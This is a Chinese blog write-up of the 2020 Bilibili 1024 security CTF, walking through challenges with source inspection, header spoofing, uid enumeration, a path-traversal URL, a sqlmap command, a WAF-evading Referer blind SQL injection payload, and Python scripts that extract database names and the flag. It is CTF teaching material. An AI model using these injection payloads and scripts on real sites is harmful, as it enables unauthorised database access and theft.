2020-1024-33的挑战状 —— 首届哔哩哔哩安全挑战赛

最新推荐文章于 2021-10-27 17:24:39 发布
最新推荐文章于 2021-10-27 17:24:39 发布
阅读量502 收藏 3
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yiiiing/article/details/109284170
版权

00x1 第一题:

题目:页面的背后是什么?

看源码

直接访问http://xxxx/api/admin即可

00x2 第二题:

题目:真正的秘密只有特殊的设备才能看到

需要更改User-Agent为bilibili Security Browser

在这里插入图片描述
00x3 第三题

题目:密码是啥?

弱口令

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iFX7Y2G3-1603677971992)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.003.png)]

00x4 第四题

题目:对不起,权限不足~

首先查看源码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bbC7PK9y-1603677971994)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.004.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-n37EEB0v-1603677971995)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.005.png)]
将role值解密为 user
对role值进行爆破
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FmJouWcJ-1603677971996)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.006.png)]

00x5 第五题

题目:别人的秘密

查看源码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-R5cLyMco-1603677971997)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.007.png)]
在这里插入图片描述
遍历uid值

在这里插入图片描述
00x6 第六题

结束亦是开始
从大佬(机智的狐狸菌)那里搬运过来的,题已经关闭了无法复现,收藏一下。

sqlmap -u 'http://45.113.201.36/blog/single.php?id=1' --batch --level 5 --risk 3 --flush-session

在这里插入图片描述

sqlmap发现存在referer时间盲注,且后端数据库为MySQL,加上--dbms mysql --dbs开始枚举裤名

在这里插入图片描述
结果跑不出裤名,我爪巴了,看来是有过滤了。

经过群里某位不想暴露ID的大佬点破,手工构建referer

Referer: 0'^if(substr((selselectect database()),1,1)>binary 0x65,(selecselectt 1+~0),0) ununionion selecselectt 1,2#

在这里插入图片描述
成功回显。接下来套用脚本

import requests
url='http://120.92.151.189/blog/single.php?id=1'
flag=''
for i in range(1,8):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        # 读数据库名
        payload="0'^if(substr((selselectect database()),{i},1)>binary {mid},(selecselectt 1+~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
        
        # 读裤中有的表
        # payload="0'^if(substr((seleselectct group_concat(table_name) from infoorrmation_schema.tables whewherere table_schema=database()),{i},1)>binary {mid},(selecselectt 1+~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
        
        # 读表中存在的字段
        # payload="0'^if(substr((selselectect group_concat(column_name) from infoorrmation_schema.columns whewherere table_name='flag' anandd table_schema=database()),{i},1)>binary {mid},(selecselectt 1+~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
        headers={
        'Referer':payload
        }
        r=requests.get(url=url,headers=headers)
        if len(r.text) == 5596:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print (flag)

获得库名、表名及字段名
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
接下来套用脚本获取flag

import requests
url='http://120.92.151.189/blog/single.php?id=1'
flag=''
for i in range(1,40):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0'^if(substr((selselectect flag from bilictf.flag),{i},1)>binary {mid},(selecselectt 1+~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
        
        # print(payload)
        headers={
        'Referer':payload
        }
        r=requests.get(url=url,headers=headers)
        if len(r.text) == 5596:
            left=mid
        else:
            right=mid
    # print(hex((left+right)/2))
    # print(right)
    flag+=chr(right)
    print (flag)

获得flag6
在这里插入图片描述

00x7 第七题

需要少年自己去探索啦~
从大佬(机智的狐狸菌)那里搬运过来的,题已经关闭了无法复现,收藏一下。
在某一题的源码发现了一个可疑的api地址

http://45.113.201.36/api/images?file=banner.png

image
猜测是任意目录访问,猜解一下

http://45.113.201.36/api/images?file=…/…/…/secret.txt

image
获得神秘字符串
在这里插入图片描述
访问得到神秘字符串

一看就是base64 一次解密得到

JDFX6QfrqzRPSmX0N61M89ipWYtJV/pBQTBOYaXQuG8fArrun3WKxWFZGwNn21cG
在这里插入图片描述

解密个屁啊,将secret.txt修改为flag7.txt

访问http://45.113.201.36/api/images?file=…/…/…/flag7.txt获得flag7
在这里插入图片描述

00x8 第八题

端口扫描扫出6379端口
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-56iWgxns-1603677972000)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.010.png)]

00x10 第十题

第十题的答案就是第六题做出来的flag

查看源码没有可利用的东西

进行目录扫描,扫描出http://xxxx/blog/test.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-my7uUifp-1603677972001)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.011.png)]
JS Fuck解密
在这里插入图片描述
在这里插入图片描述

Github搜索
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9tSNXCQ6-1603677972002)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.014.png)]

但是这个不对

应该是这一个
在这里插入图片描述

根据代码提示构造url,并根据前面的路径猜测。后面发现只要有flag.txt就行
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xYzQ0kRZ-1603677972003)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.016.png)]
看着这是第十题的flag
在这里插入图片描述

yiiiing
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
哔哩哔哩1024安全挑战赛 Bilibili CTF题解(含代码)
u013560932的博客
10-25 4729
题解 2020-10-25 Bilibili在1024节上线了一个CTF挑战赛,非常amazing啊,虽然前面几题还是很简单的,不过大佬太多了,服务器都已经被扫爆了,redis也连不上去,在我做题的时候甚至各种资源文件都已经不存在了,真是诸神混战,活生生把单机打成了联网,我都怀疑是不是有人故意删了资源文件,故意暴力扫描,让后面的人没法做题,拿不到奖品。 第一题 没啥好说的,查看源码,input里面的value就是flag 第二题 更改UA为bilibili Security Browser发送请求
2020程序员节首届哔哩哔哩安全挑战赛
weixin_45844670的博客
10-25 627
第一题 查看源码,定位对应元素,看到flag1的value 第二题 既然说了需要用bilibili Security Browser访问,那么我们改一下UA头 这里我直接把这个浏览器加到了原来的ua头之后,试了好几次都不行 后来才意识到要把其他都删掉 这里我们用bp或者f12都可以改 第三题 纯属巧合,正经做法我还没想到 name:admin pwd:bilibili 第四题 显示权限不足 这里我们想到cookie 查看了一下,发现有一个role 看起来像md5 我们解密一下 发现是user 那么
2020-1024程序员节首届哔哩哔哩安全挑战赛Write Up
热门推荐
无限迭代中......
10-24 1万+
第一题 “页面的背后是什么” 指网页源代码 Ctrl+U 查看网页源代码看到向一个地方发送了get请求 发送一个请求,或者直接找找flag1相关的东西就能找到 第二题 "真正的秘密只有特殊的设备才能看到"指需要使用bilibili Security Browser浏览器访问 使用抓包工具抓包 把浏览器(UA)伪造成"bilibili Security Browser" 需要注意的是如果是Postman需要添加Cookie 第三题 “密码是啥” 密码是啥可以自己...
2020哔哩哔哩bilibili安全挑战赛前5题思路
YooLcx的博客
10-24 6815
只有前五题是因为,剩下的不会啊orz 此外,这只是思路,一定要自己尝试~~~ 只做前5题是铁定没奖的,直接“抄答案”不会让你得到任何的好处,而且还会磨灭你自己解题闯关的兴趣,所以一定要自己尝试! 第一题: “页面的背后是什么” 指网页源代码 Ctrl+U 读网页源代码 看到向一个地方发送了get请求,你自己去发一个请求,或者直接找找flag1相关的东西就能找到 第二题: "真正的秘密只有特殊的设备才能看到"指需要使用bilibili Security Browser浏览器访问 那就 把浏览器伪造成"b.
BiliBili1024程序员节,安全攻防 2
Pai_Space
10-25 350
1. 进入链接 翻一翻没有发现任何东西,查看F12 根据提示vue.config.js 找到webpack/src/view内含有的home.vue 看到flag
互联网背景下新媒体营销模式浅析——以哔哩哔哩为例.doc
09-15
互联网背景下新媒体营销模式浅析——以哔哩哔哩为例 在互联网高速发展的背景下,新媒体行业迎来了机遇也迎来了挑战哔哩哔哩作为一家以二次元文化起步的新媒体平台,其发展的速度不容小觑,逐渐活跃在大众的视野中...
叙事·互动·元素——基于哔哩哔哩慢视频的分析.pdf
最新发布
05-30
叙事·互动·元素——基于哔哩哔哩慢视频的分析
2020哔哩哔哩流量生态白皮书-蓝鲸浑水-202101.pdf
04-24
2020哔哩哔哩流量生态白皮书-蓝鲸浑水-202101
电商的运营模式——以哔哩哔哩为例.zip
10-28
哔哩哔哩(B站)为例,这个以二次元文化为主导的视频分享网站,近年来逐渐拓展了其电商业务,展现出独特的运营模式。本文将深入探讨B站的电商运营策略,以及其如何通过自身优势与用户社区结合,构建一个富有创新的...
电商的运营模式——以哔哩哔哩为例.pdf
07-09
电商的运营模式——以哔哩哔哩为例.pdf
通信与网络中的分析室内室外协同优化提升3G方案
10-22
国际电信联盟(ITU)确定3G通信的三大主流无线接口标准分别是W-CDMA(宽频分码多重存取)、CDMA2000(多载波分复用扩频调制)和TD-SCDMA(时分同步码分多址接入)。其中W-CDMA标准主要起源于欧洲和日本的早期第三代无线研究活动,该系统在现有的GSM网络上进行使用,对于系统提供商而言可以较[1]轻易地过渡,该标准的主要支持者有欧洲、日本、韩国。去年底,美国的AT&T移 动业务分公司也宣布选取WCDMA为自己的第三代业务平台。CDMA2000系统主要是由美国高通北美公司为主导提出的,它的建设成本相对比较低廉,主要支持者包括日本、韩国和北美等地区和国家。   在强烈的市场需求下,各
2020 第一届 Bilibili 网络安全挑战赛
Specif1c的博客
10-24 2643
第一题:页面的背后是什么? 第二题: 真正的秘密只有特殊的设备才能看到 第三题: 密码是啥? 第四题: 对不起,权限不足~ 第五题: 别人的秘密 6-10题 还在研究中 …
33挑战(bilibili首届安全挑战赛)
xiaoguaiii的博客
10-26 786
0x01 前言 bilibili在1024的时候出了个活动,反正在家菜的没事做,随便看看。 0x02 flag1页面的背后是什么? 直接查看源码 <script> $.ajax({ url: "api/admin", type: "get", success:function (data) { //console.log(data); if (data.code == 200){ // 如果有值:前端跳转
bilibili 安全知识竞赛总结
Jiuh-star的博客
10-27 405
本文写自28号,比赛已经过去一天了,目前题目1~10的flag获取地点也已经全部被找到。在比赛中发现一些零零散散的问题,在此做总结。 Flag 1~5 这个没什么好说的,基础知识很容易能找到 Flag 6 Referer字段盲注。这个一开始就想到了,但是用sqlmap扫描的时候没有发现问题。后续经过大佬提醒提高了延迟再次扫描才发现。后续经过分析认为是sqlmap请求过快引起WAF拒绝访问导致失败o(╥﹏╥)o Flag 7 根据首页 /api/images?file=banner.png 猜测存在任意文件读
linux3.x漏洞,Linux 2.6.37-3.x.x PERF_EVENTS - Local Root Exploit
weixin_31981135的博客
05-16 244
/** linux 2.6.37-3.x.x x86_64, ~100 LOC* gcc-4.6 -O2 semtex.c && ./a.out* 2010 sd@fucksheep.org, salut!** update may 2013:* seems like centos 2.6.32 backported the perf bug, lol.* jewgold to 1...
mysql盲注脱裤_记一次猥琐的脱裤
weixin_35201989的博客
02-28 387
简介环境php+pdo+mysql+linuxFUCK IT因为是pdo,所以支持多行,一开始只用了时间盲注跑了用户表的列出来,然后可以通过多行语句执行updaet user set email=(select group_concat(table_name) from information_schema.columns where table_schema=database()) where ...
bilibili2021CTF-安全挑战赛-reverse-复现
ookami6497的博客
10-27 1177
哔哩哔哩安全挑战赛逆向复现第一题第二题 第一题 第一题逆向很简单,用JEB打开,点开com包,找到主函数按tab查看伪代码,加密代码很简单,一个简单的异或就行。 将v2和v1 转成字符得到两串base64加密后的密文 v2 = NjI1OzA3YGAuNjNmNzc7YmU= v1 = YWBlOmZnNjAuOmJmNzAxO2Y= base64解码后得到 v2 = 625;07``.63f77;be v1 = a`e:fg60.:bf701;f 然后搞个脚本就行,脚本如下:
2021B站1024程序员节 网络攻防CTF
Y_KolaFish_Y的博客
10-25 5843
bilibili 1024程序员节 CTF题WP author:dr@g0n???? 0x1 aes解密 1024程序员节,大家一起和2233参与解密游戏吧~ happy_1024_2233: e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d364 0408abca7deabb96a58f50471171b60e02b1a8dbd32db156 aes在线解密网站:http://tool.chacuo.net/cryptaes 0x2 WEB1 某高级前端开发攻
1076 Forwards on Weibo (Life is so fucking hard, bring a brother to tears)
qq_43813697的博客
11-30 2325
Weibo is known as the Chinese version of Twitter. One user on Weibo may have many followers, and may follow many other users as well. Hence a social network is formed with followers relations. When a...
ImageView根据屏幕大小动态设置图片的尺寸
12-17 1188
将imageview的高度设置为屏幕的1/2,宽度为铺满 private WindowManager wm; wm = (WindowManager) mContext.getSystemService(Context.WINDOW_SERVICE); LayoutParams para = holder.photo.getLayoutParams(); Display display

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值